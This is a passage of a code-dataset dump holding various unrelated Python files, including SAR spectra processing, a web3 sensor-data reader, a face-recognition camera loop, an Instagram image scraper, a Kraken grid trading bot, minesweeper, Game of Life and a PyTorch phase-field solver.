xs.k_rg.dims:\n        dims_to_average.append('burst')\n    if \"tile_line\" in xs.k_rg.dims:\n        dims_to_average.append('tile_line')\n    xs = xs.assign_coords({'k_rg': xs.k_rg.mean(dim=dims_to_average)})\n\n    # Replace the dimension name for frequencies\n    xs = xs.swap_dims({'freq_sample': 'k_rg', 'freq_line': 'k_az'})\n    # Bug Fix to define the wavenumber in range direction.\n    xs.k_rg.attrs.update({'long_name': 'wavenumber in range direction', 'units': 'rad/m'})\n\n    return xs, ds\n\n\ndef compute_xs_from_l1b_wv(_file, time_separation='2tau'):\n    # Reading the l1b file\n    # Loading the specified burst group\n    # dt = datatree.open_datatree(_file)\n    # Version 1.4\n    # ds = xr.open_dataset(_file,group=burst_type+'burst_xspectra')\n    # Version 1.4a\n    ds = xr.open_dataset(_file, group='')\n\n    # ds = dt[burst_type+'burst_xspectra'].to_dataset()\n\n    xsRe = ds['xspectra_' + time_separation + '_Re']  # +1j*ds_intra['xspectra_1tau_Im']).mean(dim=['1tau'])\n    xsIm = ds['xspectra_' + time_separation + '_Im']\n    if time_separation == '2tau':\n        xsRe = xsRe.squeeze('2tau')\n        xsIm = xsIm.squeeze('2tau')\n    if time_separation == '1tau':\n        xsRe = xsRe.mean(dim=['1tau'])\n        xsIm = xsIm.mean(dim=['1tau'])\n\n    xs = xsRe + 1j * xsIm\n\n    # Remove unique dimensions\n    # xs=xs.squeeze()\n    # convert the wavenumber variables in range and azimuth into coordinates after selection of 
one unique vector without any other dimension dependency\n    # xs = xs.assign_coords({'k_rg': xs.k_rg})\n    # Replace the dimension name for frequencies\n    xs = xs.swap_dims({'freq_sample': 'k_rg', 'freq_line': 'k_az'})\n    # Bug Fix to define the wavenumber in range direction.\n    xs.k_rg.attrs.update({'long_name': 'wavenumber in range direction', 'units': 'rad/m'})\n\n    return xs, ds\n","repo_name":"umr-lops/utils_xsarslc_l1b","sub_path":"slcl1butils/compute/compute_from_l1b.py","file_name":"compute_from_l1b.py","file_ext":"py","file_size_in_byte":4882,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"5850482814","text":"def most_frequent(a):\r\n    d={}\r\n    import operator\r\n    for i in a :\r\n        count=a.count(i)\r\n        d.update({i:count})\r\n    sort=sorted(d.items(),reverse=True,key=operator.itemgetter(1))\r\n    for i in sort:\r\n        print(i)\r\n\r\na=input(\"enter a string:\")\r\n(most_frequent(a))\r\n","repo_name":"Thejeswini2601/Mycaptain_Python_Assignment","sub_path":"most frequent.py","file_name":"most frequent.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4015937876","text":"import json\n#from web3.auto.infura import w3\nfrom web3 import Web3, HTTPProvider, IPCProvider, WebsocketProvider\n\nnode_url = \"http://127.0.0.1:7545\"\n\nweb3_instance = Web3(HTTPProvider(node_url))\n\nprint(\"Connection: \",web3_instance.isConnected())\n\nsmartContractAddress = input(\"Smart Contract Address: \")\naddress = web3_instance.toChecksumAddress(smartContractAddress)\nabi = [\n    {\n      \"inputs\": [],\n      \"payable\": False,\n      \"stateMutability\": \"nonpayable\",\n      \"type\": \"constructor\"\n    },\n    {\n      \"constant\": False,\n      \"inputs\": [\n        {\n          \"internalType\": \"string\",\n          \"name\": \"temperature\",\n          \"type\": \"string\"\n        },\n        {\n          \"internalType\": \"string\",\n          \"name\": \"pressure\",\n          \"type\": \"string\"\n        },\n        {\n          \"internalType\": \"string\",\n          \"name\": \"humidity\",\n          \"type\": \"string\"\n        },\n        {\n          \"internalType\": \"string\",\n          \"name\": \"dataTime\",\n          \"type\": \"string\"\n        }\n      ],\n      \"name\": \"mineData\",\n      \"outputs\": [],\n      \"payable\": False,\n      \"stateMutability\": \"nonpayable\",\n      \"type\": \"function\"\n    },\n    {\n      \"constant\": True,\n      \"inputs\": [],\n      \"name\": \"numOfTuples\",\n      \"outputs\": [\n        {\n          \"internalType\": \"uint256\",\n          \"name\": \"\",\n          \"type\": \"uint256\"\n        }\n      ],\n      \"payable\": False,\n      \"stateMutability\": \"view\",\n      \"type\": \"function\"\n    },\n    {\n      \"constant\": True,\n      \"inputs\": [],\n      \"name\": \"owner\",\n      \"outputs\": [\n        {\n          \"internalType\": \"address\",\n          \"name\": \"\",\n          \"type\": \"address\"\n        }\n      ],\n      \"payable\": False,\n      \"stateMutability\": \"view\",\n      \"type\": \"function\"\n    },\n    {\n      \"constant\": True,\n      \"inputs\": [\n        {\n          \"internalType\": \"uint256\",\n          \"name\": \"\",\n          \"type\": \"uint256\"\n        }\n      ],\n      \"name\": \"sensorData\",\n      \"outputs\": [\n        {\n          \"internalType\": \"address\",\n          \"name\": \"dataSender\",\n          \"type\": \"address\"\n        },\n        {\n          \"internalType\": \"string\",\n          \"name\": \"temp\",\n          \"type\": \"string\"\n        },\n        {\n          \"internalType\": \"string\",\n          \"name\": \"press\",\n          \"type\": \"string\"\n        },\n        {\n          \"internalType\": \"string\",\n          \"name\": \"humid\",\n          \"type\": \"string\"\n        },\n        {\n          \"internalType\": \"string\",\n          \"name\": \"time\",\n          \"type\": \"string\"\n        }\n      ],\n      \"payable\": False,\n      \"stateMutability\": \"view\",\n      \"type\": \"function\"\n    }\n  ]\n \n
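# Instantiate a handle to the deployed contract so its functions can be called below.\ncontract = 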
web3_instance.eth.contract(address = address, abi = abi)\n#print(contract.all_functions())\n\nprint(\"Num of Tuples: \", contract.functions.numOfTuples().call())\n\nprint(\"\\nData Tuples: \")\n\nfor i in range(int(contract.functions.numOfTuples().call())):\n print(contract.functions.sensorData(i).call())","repo_name":"khareshivang1617/BTP","sub_path":"ForRasPi/fetchData.py","file_name":"fetchData.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23988534296","text":"import os,sys\nsys.path.append(os.path.abspath(__file__))\n\nfrom datetime import datetime, timedelta\n\nimport cv2\nimport face_recognition\n\n\nclass CameraManager(object):\n def __init__(self, controller):\n self.controller = controller\n self.cap = cv2.VideoCapture(0)\n self.num_frame_to_process = 4\n if not self.cap.isOpened():\n print('Could not find the camera {}'.format(0))\n exit()\n\n self.unknown_id = 1\n self.names, self.face_encodings = self.load_face_encodings()\n self.confidence_threshold_frames = 5 # The number of frames in which the same vector for face is seen.\n self.confidence_threshold_faces = 0.01 # The distance between faces recognized by system.\n self.last_notification_time = {}\n\n def load_face_encodings(self):\n return [], []\n\n def process_face_encoding(self, face_encoding, frame, face_location):\n matches = face_recognition.compare_faces(self.face_encodings, face_encoding)\n if True in matches:\n first_match_index = matches.index(True)\n name = self.names[first_match_index]\n if name.startswith('unknown'):\n confidence = float(name[name.index('_') + 1:])\n confidence += 0.2\n if confidence > 0.9:\n current_time = datetime.now()\n # if first_match_index in self.last_notification_time:\n # last_notification_time = self.last_notification_time[first_match_index]\n # if current_time - last_notification_time < timedelta(minutes=1):\n # self.last_notification_time[first_match_index] = current_time\n # return\n\n # self.last_notification_time[first_match_index] = current_time\n top, right, bottom, left = face_location\n face_image = frame[top:bottom, left:right, :]\n\n self.controller.push(\n {\n 'type': 'camera',\n 'event': 'face_seen',\n 'face_image': face_image,\n 'face_location': face_location,\n 'face_encoding': face_encoding,\n 'time': current_time\n }\n )\n else:\n self.names[first_match_index] = f'unknown_{confidence}'\n # else:\n # print(f'Greetings {name}!! 
How is it going')\n        else:\n            self.names.append('unknown_0.0')\n            self.face_encodings.append(face_encoding)\n\n    def run(self):\n        counter = 0\n\n        while True:\n            counter += 1\n            ret, frame = self.cap.read()\n            if counter == self.num_frame_to_process:\n                counter = 0\n                # Capture frame-by-frame\n                # small_frame = cv2.resize(frame, (0, 0), fx=0.5, fy=0.5)\n                small_frame = frame\n                rgb_small_frame = small_frame[:, :, ::-1]\n\n                face_locations = face_recognition.face_locations(rgb_small_frame)\n                # print(face_locations)\n                frame_face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)\n                for i, face_encoding in enumerate(frame_face_encodings):\n                    self.process_face_encoding(face_encoding, frame, face_locations[i])\n\n                # Display the results\n                for top, right, bottom, left in face_locations:\n                    # Scale back up face locations since the frame we detected in was scaled to 1/4 size\n                    # top *= 2\n                    # right *= 2\n                    # bottom *= 2\n                    # left *= 2\n                    cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)\n\n                # Display the resulting frame\n                cv2.imshow('frame', frame)\n                if cv2.waitKey(1) & 0xFF == ord('q'):\n                    break\n\n        # When everything done, release the capture\n        self.cap.release()\n        cv2.destroyAllWindows()\n","repo_name":"sharare90/ARVR-LabAgent-Controller","sub_path":"cameramanager/camera_manager.py","file_name":"camera_manager.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2240050993","text":"# BOJ 4948 Bertrand's Postulate\n# https://www.acmicpc.net/problem/4948\n\nimport math\n\ndef isPrime(num):\n    if num == 1: return False\n    for i in range(2, int(math.sqrt(num))+1):\n        if num % i == 0: return False\n    return True\n\nli = list(range(2,246912)) # precompute up to 246912, which is twice 123456\nprime_li = []\nfor i in li:\n    if isPrime(i): # collect the primes in that range into prime_li in advance\n        prime_li.append(i)\n\nwhile(1):\n    answer = 0\n    n = int(input())\n    if n == 0: break # stop when the input is 0\n\n    for i in prime_li: # from the precomputed prime_li\n        if n < i <= n*2: # if i lies within the range (n, 2n] \n            answer += 1 # increase the count by 1\n    \n    print(answer)","repo_name":"yurileeeee/Algorithm","sub_path":"BOJ/9_math2/4948.py","file_name":"4948.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18928617213","text":"h = []\nfor i in range(9):\n    h.append(int(input()))\nsave=[0]*2\nsum_h = sum(h)\nfor a in range(len(h)):\n    for b in range(a+1,len(h)):\n        if sum_h-(h[a]+h[b])==100:\n            save[0]=h[a]\n            save[1]=h[b]\nh.remove(save[0])\nh.remove(save[1])\n\nh.sort()\nfor i in h:\n    print(i)\n","repo_name":"choisony/Baekjoon","sub_path":"Brute Force/2309 일곱 난쟁이.py","file_name":"2309 일곱 난쟁이.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19917711480","text":"# Import required libraries\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport numpy as np\n\n# Generate a larger sample dataset for medical diagnosis\nnp.random.seed(42)\n\n# Generating features (X) with 100,000 instances and 5 features\nX = np.random.rand(100000, 5)\n\n# Generating labels (y) randomly as 0 or 1\ny = np.random.randint(2, size=100000)\n\n# Define the BLB sampling function\ndef blb_sampling(X_train, y_train, sample_size):\n    num_instances = X_train.shape[0]\n    indices = np.random.choice(num_instances, size=sample_size, replace=True)\n    
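# np.random.choice with replace=True samples WITH replacement, so a subsample may contain duplicate rows (standard bootstrap behavior)\n    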
X_blb = X_train[indices]\n    y_blb = y_train[indices]\n    return X_blb, y_blb\n\n# Split the dataset into training and testing sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n# Create an ensemble of BLB-RF models\nnum_models = 10\nsample_size = int(0.8 * X_train.shape[0])\n\nmodels = []\nfor i in range(num_models):\n    # Perform BLB sampling on the training data\n    X_train_blb, y_train_blb = blb_sampling(X_train, y_train, sample_size)\n\n    # Train a Random Forest model on the BLB sample\n    model = RandomForestClassifier(n_estimators=100)\n    model.fit(X_train_blb, y_train_blb)\n\n    # Add the trained model to the ensemble\n    models.append(model)\n\n# Make predictions on the testing data using the ensemble\nensemble_predictions = []\nfor model in models:\n    predictions = model.predict(X_test)\n    ensemble_predictions.append(predictions)\n\n# Combine the predictions from the ensemble using voting or averaging\nfinal_predictions = ensemble_predictions[0]\nfor i in range(1, num_models):\n    final_predictions += ensemble_predictions[i]\nfinal_predictions = final_predictions.astype(float)\nfinal_predictions /= num_models\n\n# Evaluate the accuracy of the ensemble predictions\naccuracy = accuracy_score(y_test, final_predictions.round().astype(int))\nprint(\"Accuracy of BLB-RF:\", accuracy)\n\n# Train a standard Random Forest model on the full training set\nstandard_model = RandomForestClassifier(n_estimators=100)\nstandard_model.fit(X_train, y_train)\n\n# Make predictions on the testing data using the standard RF model\nstandard_predictions = standard_model.predict(X_test)\n\n# Evaluate the accuracy of the standard RF model\nstandard_accuracy = accuracy_score(y_test, standard_predictions)\nprint(\"Accuracy of Standard RF:\", standard_accuracy)\n\n","repo_name":"eshe030/BLB","sub_path":"Code_in_python.py","file_name":"Code_in_python.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16547203438","text":"# Instagram photo crawling - for practice only, do NOT use it anywhere for real XXXX each website states whether crawling is allowed.\nfrom selenium import webdriver\nimport time\nimport urllib.request\nfrom urllib.parse import quote_plus\n\nid = '#{your_id}'\npw = '#{your_password}'\n\n\nurl = input('Hashtag to search: ')\ndriver = webdriver.Chrome('./chromedriver') # open the browser\ndriver.implicitly_wait(3) # wait while the browser opens\ndriver.get('https://www.instagram.com/accounts/login/')\ndriver.implicitly_wait(2)\ndriver.find_element_by_name('username').send_keys(id) # type the id into the username field\ndriver.find_element_by_name('password').send_keys(pw) # type the pw into the password field\ndriver.find_element_by_class_name('sqdOP.L3NKy').click()\ntime.sleep(2)\ndriver.find_element_by_xpath('//*[@id=\"react-root\"]/section/main/div/div/div/div/button').click()\ntime.sleep(2)\ndriver.find_element_by_xpath('/html/body/div[4]/div/div/div/div[3]/button[2]').click()\ndriver.get('https://www.instagram.com/explore/tags/'+url+'/')\n# print(driver.find_element_by_class_name('g47SY').text)\nfrom selenium.webdriver.common.keys import Keys\nimport os\n\npath = '/home/pc31/Desktop/img/' # path where the images will be saved \nimg_folder = url\nif not os.path.isdir(path+img_folder):\n    os.mkdir(path+img_folder)\ntry:\n    cnt = 10\n    body = driver.find_element_by_tag_name('body')\n    div = driver.find_elements_by_class_name('KL4Bh')\n    pagedowns = 1\n    while pagedowns < cnt:\n        body.send_keys(Keys.PAGE_DOWN) # scroll the page down \n        time.sleep(1)\n        pagedowns += 1\n    img = driver.find_elements_by_css_selector('.KL4Bh > img')\n    imgUrl = set()\n    for i in img:\n        
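# collect the image source URLs; using a set silently drops duplicate links\n        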
imgUrl.add(i.get_attribute('src'))\n        print(i.get_attribute('src'))\n    for index, link in enumerate(imgUrl):\n        # name= i.split('/')\n        # if '.jpg' in name[-1]:\n        #     print(name[-1])\n        urllib.request.urlretrieve(link,path+img_folder+'/'+url+f'{index}.jpg')\nexcept Exception as e:\n    print(str(e))\ndriver.close()\n","repo_name":"kyuwon53/nextIT-study","sub_path":"python/croll_photo.py","file_name":"croll_photo.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"72954842473","text":"from krakenex.api import API\r\nimport logger\r\nimport bot\r\nimport AssetPairs as AP\r\n\r\nclass GMM_BOT(bot.Bot):\r\n\r\n\tdef __init__(self, path, pair):\r\n\t\tsuper(GMM_BOT, self).__init__(path, pair)\r\n\t\tself.mAPI\r\n\t\tself.mPair: dict[str, str] = pair\r\n\t\tself.mBase = pair['base']\r\n\t\tself.mQuote = pair['quote']\r\n\t\tself.mPairName = pair['pair'] \r\n\t\tself.mTickerPairName = self.mBase + self.mQuote\r\n\t\tself.mPairOrderMin = pair['order_min']\r\n\r\n\t\t# Can be changed during trading\r\n\t\tself.mTradeVolume = self.mPairOrderMin\r\n\t\tself.mPairFeePercent: float = 0.0026\r\n\t\tself.mSpread: float = float(bot.user.getUserInput(\"Spread? (Warning given if spread is not profitable) \"))\r\n\t\tself.mBuyMin: float = float(bot.user.getUserInput(\"Minimum buy? \"))\r\n\t\tself.mBuyMax: float = float(bot.user.getUserInput(\"Maximum buy? \"))\r\n\t\tself.mSellMin: float = float(bot.user.getUserInput(\"Minimum sell? \"))\r\n\t\tself.mSellMax: float = float(bot.user.getUserInput(\"Maximum sell? \"))\r\n\t\tself.mOrderGrid = self.createOrderGrid(self.mSpread, self.mBuyMin, self.mBuyMax, self.mSellMin, self.mSellMax )\r\n\r\n\t\t# Update after trade\r\n\t\tself.baseBalance = float(self.mAPI.get_asset_balance(pair['base']))\r\n\t\tself.quoteBalance = float(self.mAPI.get_asset_balance(pair['quote']))\r\n\r\n\tdef createOrderGrid(self, spread: float, buyMin: float, buyMax: float, sellMin: float, sellMax: float):\r\n\t\task = float(self.mAPI.get_ask_pair(self.mPairName, self.mTickerPairName))\r\n\t\t# The trade volume needs to be multiplied by the price to check if in range for profitability\r\n\t\tprofit = (spread - ((float(self.mTradeVolume) * ask) * self.mPairFeePercent) )\r\n\t\tif (profit) <= 0:\r\n\t\t\tprint(\"Chosen spread will not be profitable on trades\")\r\n\t\t\tprint(\"profitability:\", profit)\r\n\t\tbuyRef = 1\r\n\t\tsellRef = 10000\r\n\r\n\t\tbuyPoint = buyMin\r\n\t\tbuys = []\r\n\t\twhile ( buyPoint < buyMax ):\r\n\t\t\tbuys.append({'volume': self.mPairOrderMin, 'price' : buyPoint, 'ref' : buyRef, 'buy_sell' : \"buy\"})\r\n\t\t\tbuyPoint += spread\r\n\t\t\tbuyRef += 1\r\n\r\n\t\tsellPoint = sellMin\r\n\t\tsells = []\r\n\t\twhile (sellPoint < sellMax):\r\n\t\t\tsells.append({'volume': self.mPairOrderMin, 'price' : sellPoint, 'ref' : sellRef, 'buy_sell' : \"sell\"})\r\n\t\t\tsellPoint += spread\r\n\t\t\tsellRef += 1\r\n\r\n\t\torderGrid = []\r\n\t\tfor s in sells:\r\n\t\t\torderGrid.append(s)\r\n\t\tfor b in buys:\r\n\t\t\torderGrid.append(b)\r\n\r\n\t\treturn orderGrid\r\n\r\n\r\n\tdef trade(self, base, quote, pairName, order_min):\r\n\t\ttickerPairName = base+quote\r\n\t\torders = self.queryAPI_allOrders()\r\n\r\n\t\t#### SCOUT/TRADE ####\r\n\t\t# start bot logger\r\n\t\tself.mGMMLogger = logger.setup_logger(self.mTickerPairName, self.mTickerPairName)\r\n\t\tself.mGMMLogger.info(\r\n\t\t\t'------------------------- New case --------------------------------')\r\n\t\t# Because of rounding 
errors balance may need to be rounded down 0.1 worth\r\n\t\tself.mGMMLogger.info(base + ' ' + str(self.baseBalance) + ' ' + quote + ' ' + str(self.quoteBalance))\r\n\r\n\t\t### TODO SEE IF CORRECT BUY IS BEING PULLED\r\n\t\tfor orderToPlace in self.mOrderGrid:\r\n\t\t\t# Check if order is on the books if it is get the order and txid if not order1 and txid are -1\r\n\t\t\torder1, txid1 = self.mAPI.get_order(orders, orderToPlace['price'], pairName)\r\n\t\t\tself.mGMMLogger.info('txid1 = ' + str (txid1))\r\n\t\t\tif float(orderToPlace['volume']) >= float(self.mPair['order_min']):\r\n\t\t\t\ttry:\r\n\t\t\t\t\t\t# submit following data and place or update order:\r\n\t\t\t\t\t\t# ( library instance, order info, pair, direction of order,\r\n\t\t\t\t\t\t# size of order, price, userref, txid of existing order,\r\n\t\t\t\t\t\t# price precision, leverage, logger instance, oflags )\r\n\t\t\t\t\t\t# \r\n\r\n\t\t\t\t\t\tres = self.mAPI.check4trade(order1, pairName, orderToPlace['buy_sell'], float(orderToPlace['volume']),\r\n\t\t\t\t\t\t \t\t\t\t\t\t\t\tfloat(orderToPlace['price']), int(orderToPlace['ref']), txid1, self.mGMMLogger, 'post')\r\n\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\tself.mGMMLogger.info('traded: ' + str(res))\r\n\t\t\t\texcept Exception as e:\r\n\t\t\t\t\t\tprint('Error occurred when ', orderToPlace['buy_sell'], pairName, e)\r\n\t\t\t\t\t\tself.mGMMLogger.warning('Error occurred when ' + orderToPlace['buy_sell'] + pairName + str(e))\r\n\t\t\t\t# cancel existing order if new order size is less than minimum\r\n\t\t\telse:\r\n\t\t\t\tres = self.mAPI.check4cancel(order1, txid1)\r\n\t\t\t\tprint('Not enough funds to ', orderToPlace['buy_sell'], pairName, 'or trade vol too small; canceling', res)\r\n\t\t\t\tself.mGMMLogger.info('Not enough funds to ' +\r\n\t\t\t\t\t\t\t\t\t\tstr(orderToPlace['buy_sell']) + ' ' + pairName +\r\n\t\t\t\t\t\t\t\t\t\t' or trade vol too small; canceling ' + str(res))\r\n\t\t\tif res != -1:\r\n\t\t\t\t\tif 'error' in res and res.get('error') != []:\r\n\t\t\t\t\t\t\tself.mGMMLogger.warning(pairName + ' trading error ' + str(res))\r\n\t\r\n\t\tself.mGMMLogger.handlers.pop()\r\n\t\treturn\r\n\r\n\r\n","repo_name":"Bvaladez/bardedKraken","sub_path":"grid_market_maker_BOT.py","file_name":"grid_market_maker_BOT.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12076237737","text":"import sys\nimport random\nimport ctypes\nfrom tkinter import Label, Button, PhotoImage\nfrom utils import height_percentage, width_percentage\nfrom settings import GRID_SIZE, MINES_COUNT, CELL_COUNT\n\nwidth = int(width_percentage(70) / GRID_SIZE)\nheight = int(height_percentage(70) / GRID_SIZE)\n\n\nclass Cell:\n    all = []\n    cell_count = CELL_COUNT\n    cell_count_label = None\n\n    def __init__(self, x, y):\n        self.x = x\n        self.y = y\n        self.is_mine = False\n        self.is_open = False\n        self.is_mine_candidate = False\n        self.cell_btn = None\n\n        Cell.all.append(self)\n\n    @property\n    def surrounding_cells(self):\n        return [cell for cell in Cell.all if self._is_surrounding_cell(cell.x, cell.y)]\n\n    @property\n    def surrounding_mines(self):\n        return [mine for mine in self.surrounding_cells if mine.is_mine]\n\n    @property\n    def surrounding_mines_count(self):\n        return len(self.surrounding_mines)\n\n    def create_btn(self, location):\n        image = PhotoImage()\n        btn = Button(\n            location,\n            bg='lightgray',\n            image=image,\n            width=width,\n            height=height,\n            compound='center'\n        )\n\n        
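# '<Button-1>' fires on the left mouse button and '<Button-3>' on the right\n        btn.bind('<Button-1>', self._left_click_actions) # Left 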
click\n        btn.bind('<Button-3>', self._right_click_actions) # Right Click\n\n        self.cell_btn = btn\n\n    @staticmethod\n    def create_cell_count_label(location):\n        Cell.cell_count_label = Label(\n            location,\n            bg='black',\n            fg='white',\n            text=f'Cells Left: {Cell.cell_count}',\n            font=('', 30)\n        )\n\n    def _left_click_actions(self, _):\n        if not self.is_mine_candidate:\n            if self.is_mine:\n                self._show_mine()\n            else:\n                if self.surrounding_mines_count == 0:\n                    for cell in self.surrounding_cells:\n                        cell.show_cell()\n                self.show_cell()\n                if Cell.cell_count == MINES_COUNT:\n                    ctypes.windll.user32.MessageBoxW(0, 'You win the game!', 'Congratulations', 0)\n\n    def _right_click_actions(self, _):\n        if not self.is_open:\n            image = PhotoImage()\n            self.cell_btn.configure(image=image, bg='lightgray' if self.is_mine_candidate else 'orange')\n            self.is_mine_candidate = not self.is_mine_candidate\n\n    def _show_mine(self):\n        \"\"\"Interrupts the game and displays a message that player lost!\"\"\"\n        image = PhotoImage()\n        self.cell_btn.configure(image=image, bg='red')\n\n        ctypes.windll.user32.MessageBoxW(0, 'You clicked on a mine!', 'Game Over', 0)\n        sys.exit()\n\n    def show_cell(self):\n        if not self.is_open:\n            Cell.cell_count -= 1\n            image = PhotoImage()\n            self.cell_btn.configure(image=image, bg='white', text=f'{self.surrounding_mines_count}')\n            # replace the text of the count with the new value\n            if Cell.cell_count_label:\n                Cell.cell_count_label.configure(text=f'Cells Left: {Cell.cell_count}')\n\n            # Mark the cell as opened; we could unbind the event after opening the cell\n            self.is_open = True\n\n    def _is_surrounding_cell(self, x, y):\n        \"\"\"Check if the specified coordinates surround the current cell\"\"\"\n        if x == self.x and y == self.y:\n            return False\n        if x - 1 <= self.x <= x + 1 and y - 1 <= self.y <= y + 1:\n            return True\n        else:\n            return False\n\n    @staticmethod\n    def randomize_mines():\n        cells_to_mine = random.sample(Cell.all, MINES_COUNT)\n        for cell in cells_to_mine:\n            cell.is_mine = True\n\n    def __repr__(self):\n        return f'Cell({self.x}, {self.y}, {self.is_mine})'\n","repo_name":"pyscriptbug/minesweeper","sub_path":"cell.py","file_name":"cell.py","file_ext":"py","file_size_in_byte":3787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"86451664923","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 16 07:40:09 2022\n\n@author: Roger Hegstrom (rhegstrom@avc.edu)\n\nNOTE: \n    - I WOULD RUN THIS ON THE COMMAND LINE AND NOT IN SPYDER ex: python main.py\n    \n    \nConway's Game of Life\n---------------------\n    RULES:\n    If cell is DEAD and has 3 ALIVE neighbors --> becomes ALIVE\n    \n    If cell is ALIVE and has 2 or 3 ALIVE neighbors --> stays ALIVE\n    otherwise --> cell DIES\n\n    Display the 20x20 grid at each step, observe how the game progresses. \n    \nReport on:\n    1. what was the fewest number of steps (from a random beginning) until all cells are 'dead,'\n    2. what was the smallest number of steps until a stable configuration was found. Put these answers in comments in the code. 
\n    \n    I ran the program 30+ times:\n    The smallest number of steps to reach a stable configuration was 29\n    The smallest number of steps for all cells to die was 49 (ALL CELLS ONLY DIED TWICE)\n    \n    \n\"\"\"\nimport numpy as np\nimport os\nimport time\n\n\n#ROWS = os.get_terminal_size().lines - 1\n#COLUMNS = os.get_terminal_size().columns\n\nROWS = 20\nCOLUMNS = 20\n\nALIVE = 1\nDEAD = 0\n\n\ndef calculateAliveNeighbors(row,col):\n    \"\"\"\n    Returns the alive neighbors of (row, col) on the board\n\n    Parameters\n    ----------\n    row : int\n        row in the board array.\n    col : int\n        column in the board array.\n\n    Returns\n    -------\n    alive_neighbors : int\n        Number of alive neighbors.\n\n    \"\"\" \n    # Keep values in the proper ranges within the board matrix\n    row_begin = (row-1) if (row-1) >= 0 else 0\n    row_end = (row+2) if (row+2) < ROWS else ROWS\n    \n    col_begin = (col-1) if (col-1) >= 0 else 0\n    col_end = (col+2) if (col+2) < COLUMNS else COLUMNS\n\n    alive_neighbors = (np.sum(board[row_begin:row_end, col_begin:col_end])\n                       - board[row, col])\n    \n    return alive_neighbors\n\n\ndef printBoard():\n    \"\"\"\n    Prints the current board to screen\n\n    Returns\n    -------\n    None.\n\n    \"\"\"\n    os.system('cls')\n    for row in range(ROWS):\n        for col in range(COLUMNS):\n            print('#' if board[row, col] == ALIVE else ' ', end='')\n        print('')\n    \n\n\n\n# Populate initial board with random values and print board\nboard = np.random.choice([0, 1], p=[0.6, 0.4], size=(ROWS, COLUMNS)) \n\npreviousBoard = np.zeros((20,20))\n    \nprintBoard()\ntime.sleep(1)\n\nsteps = 0\n# Main Program Loop\nwhile True:\n    tempBoard = np.zeros((ROWS, COLUMNS), dtype=int) # next iteration board\n    for row in range(ROWS):\n        for col in range(COLUMNS):\n            alive_neighbors = calculateAliveNeighbors(row, col)\n            if ((board[row, col] == ALIVE and alive_neighbors in (2, 3)) \n                or (board[row, col] == DEAD and alive_neighbors == 3)):\n                tempBoard[row, col] = ALIVE\n            else:\n                tempBoard[row, col] = DEAD \n    \n    steps = steps + 1\n    if ( (previousBoard == board).all() or (previousBoard == tempBoard).all()):\n        print(f\"(steps={steps}) A stable state has been achieved...\")\n        exit(0)\n    \n    previousBoard = board.copy()\n    board = tempBoard.copy()\n    printBoard()\n    \n    if (np.sum(board) == 0 ):\n        print(f\"(steps={steps}) A stable state has been reached (all cells died)...\")\n#    time.sleep(0.1)","repo_name":"rhegstrom/GameOfLife","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26230799760","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport time\nimport numpy as np\n\n\nclass Net(nn.Module):\n    def __init__(self, h2, dt, eps, device):\n        super(Net, self).__init__()\n\n        self.h2 = h2\n        self.dt = dt\n        self.eps = eps\n        self.delta = torch.Tensor([[[0, 0, 0], [0, 1, 0], [0, 0, 0]], [[0, 1, 0], [1, -6, 1], [0, 1, 0]],\n                                   [[0, 0, 0], [0, 1, 0], [0, 0, 0]]]).to(device)\n        self.delta = torch.unsqueeze(self.delta, 0)\n        self.delta = torch.unsqueeze(self.delta, 0)\n        self.pad = nn.ReplicationPad3d(1)\n        self.alpha = self.dt / eps ** 2\n\n    def forward(self, x):\n        u_pad = self.pad(x)\n        dff = F.conv3d(u_pad, self.delta)\n        x = (1 + self.alpha) * x - self.alpha * x ** 3 + self.dt * dff / self.h2\n\n        return x\n\ndef fdm_pytorch(nx, ny, nz, init_arr, h2, dt, eps, maxit, init, save, mode):\n\n    if mode == 0:\n        device = \"cuda:0\"\n        print(\"GPU version\")\n    else:\n        device = \"cpu\"\n        print(\"CPU version\")\n\n    
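# each forward pass of Net advances the phase field by one explicit finite-difference time step\n    model = Net(h2, dt, eps, 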
